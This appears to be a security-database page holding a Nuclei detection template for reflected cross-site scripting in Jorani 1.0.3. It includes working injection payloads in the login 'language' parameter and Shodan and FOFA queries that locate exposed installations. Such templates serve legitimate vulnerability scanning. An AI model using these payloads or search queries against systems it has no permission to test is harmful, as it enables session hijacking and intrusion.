jorani-benjamin-xss: Jorani v1.0.3-2014-2023 Benjamin BALET - Cross-Site Scripting

2025-08-01 Jorani PoC Public

Description

The value of the `language request` parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 75943";alert(1)//569 was submitted in the language parameter. This input was echoed unmodified in the application's response. The attacker can modify the token session and he can discover sensitive information for the server.

PoC

id: jorani-benjamin-xss

info:
  name: Jorani v1.0.3-2014-2023 Benjamin BALET - Cross-Site Scripting
  author: ritikchaddha
  severity: medium
  description: |
    The value of the `language request` parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 75943";alert(1)//569 was submitted in the language parameter. This input was echoed unmodified in the application's response. The attacker can modify the token session and he can discover sensitive information for the server.
  reference:
    - https://packetstormsecurity.com/files/174341/Jorani-1.0.3-Cross-Site-Scripting.html
  classification:
    cwe-id: CWE-80
  metadata:
    verified: true
    max-request: 2
    shodan-query: http.favicon.hash:-2032163853
    product: jorani
    vendor: jorani
    fofa-query: icon_hash=-2032163853
  tags: packetstorm,jorani,benjamin,xss,vuln

http:
  - raw:
      - |
        GET /session/login HTTP/1.1
        Host: {{Hostname}}
      - |
        POST /session/login HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        csrf_test_jorani={{csrf}}&last_page=session%2Flogin&language=en-GBarh5l%22%3e%3cscript%3ealert(document.domain)%3c%2fscript%3ennois&login={{randstr}}&CipheredValue=

    host-redirects: true

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "<script>alert(document.domain)</script>"
          - "_jorani"
        condition: and

      - type: word
        part: header
        words:
          - text/html

      - type: status
        status:
          - 200

    extractors:
      - type: regex
        name: csrf
        part: body
        group: 1
        regex:
          - 'name="csrf_test_jorani" value="([0-9a-z]+)"'
        internal: true
# digest: 4a0a0047304502205f369f18107d9c7170aa6f35fc789097a682267d535d788a9ad5d1a78b4532af022100fefcc890555251b4bbc9e6574c193c9de034b5f155e642acb7fa9a45f66d7cbf:922c64590222798bb761d5b6d8e72950

# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.

References

Related Vulnerabilities